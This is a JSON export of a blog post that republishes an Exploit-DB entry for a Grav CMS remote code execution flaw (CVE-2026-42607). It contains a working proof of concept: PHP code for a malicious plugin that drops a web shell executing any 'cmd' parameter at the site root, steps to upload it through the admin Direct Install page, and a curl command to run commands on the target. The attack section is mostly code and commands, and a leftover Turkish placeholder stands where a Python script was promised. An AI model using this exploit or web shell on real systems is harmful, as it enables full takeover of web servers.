{"id":56934,"date":"2026-05-26T10:35:31","date_gmt":"2026-05-26T10:35:31","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=56934"},"modified":"2026-05-26T10:35:31","modified_gmt":"2026-05-26T10:35:31","slug":"grav-cms-200-beta2-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=56934","title":{"rendered":"Grav CMS 2.0.0-beta.2 – Remote Code Execution_EDB-ID:52578"},"content":{"rendered":"

{“lastseen”:”2026-05-26T15:27:57″,”description”:”Exploit Title: Grav CMS ‘onPluginsInitialized’, 0; public f…”,”published”:”2026-05-26T00:00:00″,”modified”:”2026-05-26T00:00:00″,”type”:”exploitdb”,”title”:”Grav CMS 2.0.0-beta.2 – Remote Code Execution”,”source”:””,”references”:””,”id”:”EDB-ID:52578″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-42607″],”sourceData”:”# Exploit Title: Grav CMS \\u003c 2.0.0-beta.2 – Remote Code Execution (RCE) \\r\\n# Date: 2026-05-08\\r\\n# Exploit Author: Mustafa Murat Akg\u00fcl\\r\\n# Vendor Homepage: https:\/\/getgrav.org\/\\r\\n# Software Link: https:\/\/github.com\/getgrav\/grav\\r\\n# Version: \\u003c 2.0.0-beta.2\\r\\n# CVE: CVE-2026-42607 \/ GHSA-w48r-jppp-rcfw\\r\\n# Tested on: Linux\/Ubuntu (Grav Admin Plugin Enabled)\\r\\n\\r\\nTechnical Details:\\r\\nThe Grav CMS \\”Direct Install\\” feature in the Admin plugin allows administrators \\r\\nto upload plugins as ZIP files. The system failed to adequately validate the \\r\\ncontents of the ZIP archive or prevent path traversal (Zip Slip) during extraction. \\r\\nBy crafting a malicious plugin that hooks into Grav events (e.g., onPluginsInitialized), \\r\\nan attacker can execute arbitrary PHP code or drop a persistent web shell on the root directory.\\r\\n\\r\\nProof of Concept (PoC):\\r\\n\\r\\n1. Create a malicious plugin structure:\\r\\n – shellplugin\/blueprints.yaml\\r\\n – shellplugin\/shellplugin.yaml\\r\\n – shellplugin\/shellplugin.php (Payload below)\\r\\n\\r\\n— shellplugin.php —\\r\\n\\u003c?php\\r\\nnamespace Grav\\\\Plugin;\\r\\nuse Grav\\\\Common\\\\Plugin;\\r\\n\\r\\nclass ShellpluginPlugin extends Plugin {\\r\\n public static function getSubscribedEvents(): array {\\r\\n return [‘onPluginsInitialized’ =\\u003e [‘onPluginsInitialized’, 0]];\\r\\n }\\r\\n public function onPluginsInitialized(): void {\\r\\n $shell_path = GRAV_ROOT . ‘\/shell.php’;\\r\\n if (!file_exists($shell_path)) {\\r\\n file_put_contents($shell_path, ‘\\u003c?php system($_GET[\\”cmd\\”]); ?\\u003e’);\\r\\n }\\r\\n }\\r\\n}\\r\\n———————-\\r\\n\\r\\n2. Compress the directory:\\r\\n $ zip -r shellplugin.zip shellplugin\/\\r\\n\\r\\n3. Log in to the Grav Admin panel and navigate to:\\r\\n \/admin\/tools\/direct-install\\r\\n\\r\\n4. Upload the ‘shellplugin.zip’ file.\\r\\n\\r\\n5. Once installed, the plugin triggers on the next request to the site, \\r\\n dropping a shell at the root.\\r\\n\\r\\n6. Access your shell:\\r\\n curl \\”http:\/\/\\u003ctarget\\u003e\/shell.php?cmd=id\\”\\r\\n\\r\\nExploit Script (Python):\\r\\n[Buraya yukar\u0131da payla\u015ft\u0131\u011f\u0131n Python scriptini ekleyebilirsin]\\r\\n\\r\\nImpact:\\r\\nFull system-level access under the context of the web server user. An attacker \\r\\nwith administrative privileges (or via CSRF) can compromise the entire server.”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52578″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52578″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-05-26T15:27:57″,”description”:”Exploit Title: Grav CMS ‘onPluginsInitialized’, 0; public f…”,”published”:”2026-05-26T00:00:00″,”modified”:”2026-05-26T00:00:00″,”type”:”exploitdb”,”title”:”Grav CMS 2.0.0-beta.2 – Remote Code Execution”,”source”:””,”references”:””,”id”:”EDB-ID:52578″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-42607″],”sourceData”:”# Exploit Title: Grav CMS \\u003c 2.0.0-beta.2 – Remote Code Execution (RCE)…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,40,13,7,11,5],"class_list":["post-56934","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nGrav CMS 2.0.0-beta.2 - Remote Code Execution_EDB-ID:52578 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=56934\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Grav CMS 2.0.0-beta.2 - Remote Code Execution_EDB-ID:52578 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-05-26T15:27:57″,”description”:”Exploit Title: Grav CMS ‘onPluginsInitialized’, 0; public f…”,”published”:”2026-05-26T00:00:00″,”modified”:”2026-05-26T00:00:00″,”type”:”exploitdb”,”title”:”Grav CMS 2.0.0-beta.2 – Remote Code Execution”,”source”:””,”references”:””,”id”:”EDB-ID:52578″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-42607″],”sourceData”:”# Exploit Title: Grav CMS u003c 2.0.0-beta.2 – Remote Code Execution (RCE)...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=56934\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-26T10:35:31+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56934#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56934\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Grav CMS 2.0.0-beta.2 – Remote Code Execution_EDB-ID:52578\",\"datePublished\":\"2026-05-26T10:35:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56934\"},\"wordCount\":530,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.1\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=56934#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56934\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56934\",\"name\":\"Grav CMS 2.0.0-beta.2 - Remote Code Execution_EDB-ID:52578 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-26T10:35:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56934#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=56934\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56934#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Grav CMS 2.0.0-beta.2 – Remote Code Execution_EDB-ID:52578\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Grav CMS 2.0.0-beta.2 - Remote Code Execution_EDB-ID:52578 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=56934","og_locale":"en_US","og_type":"article","og_title":"Grav CMS 2.0.0-beta.2 - Remote Code Execution_EDB-ID:52578 - zero redgem","og_description":"{“lastseen”:”2026-05-26T15:27:57″,”description”:”Exploit Title: Grav CMS ‘onPluginsInitialized’, 0; public f…”,”published”:”2026-05-26T00:00:00″,”modified”:”2026-05-26T00:00:00″,”type”:”exploitdb”,”title”:”Grav CMS 2.0.0-beta.2 – Remote Code Execution”,”source”:””,”references”:””,”id”:”EDB-ID:52578″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-42607″],”sourceData”:”# Exploit Title: Grav CMS u003c 2.0.0-beta.2 – Remote Code Execution (RCE)...","og_url":"https:\/\/zero.redgem.net\/?p=56934","og_site_name":"zero redgem","article_published_time":"2026-05-26T10:35:31+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=56934#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=56934"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Grav CMS 2.0.0-beta.2 – Remote Code Execution_EDB-ID:52578","datePublished":"2026-05-26T10:35:31+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=56934"},"wordCount":530,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.1","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=56934#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=56934","url":"https:\/\/zero.redgem.net\/?p=56934","name":"Grav CMS 2.0.0-beta.2 - Remote Code Execution_EDB-ID:52578 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-26T10:35:31+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=56934#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=56934"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=56934#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Grav CMS 2.0.0-beta.2 – Remote Code Execution_EDB-ID:52578"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/56934","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=56934"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/56934\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=56934"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=56934"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=56934"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}